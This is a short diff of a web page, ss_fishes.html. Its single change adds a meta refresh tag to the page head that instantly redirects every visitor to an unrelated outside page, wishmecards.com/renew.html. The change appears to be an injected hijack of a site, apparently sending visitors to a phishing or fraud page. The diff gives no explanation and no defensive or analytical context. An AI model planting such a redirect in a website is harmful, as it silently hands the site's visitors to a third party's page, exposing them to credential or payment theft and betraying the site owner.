--- a/ss_fishes.html
+++ b/ss_fishes.html
@@ -1,4 +1,4 @@
-<html lang="en"><head>
+<html lang="en"><head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" />
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <!-- Tell the browser to be responsive to screen width -->
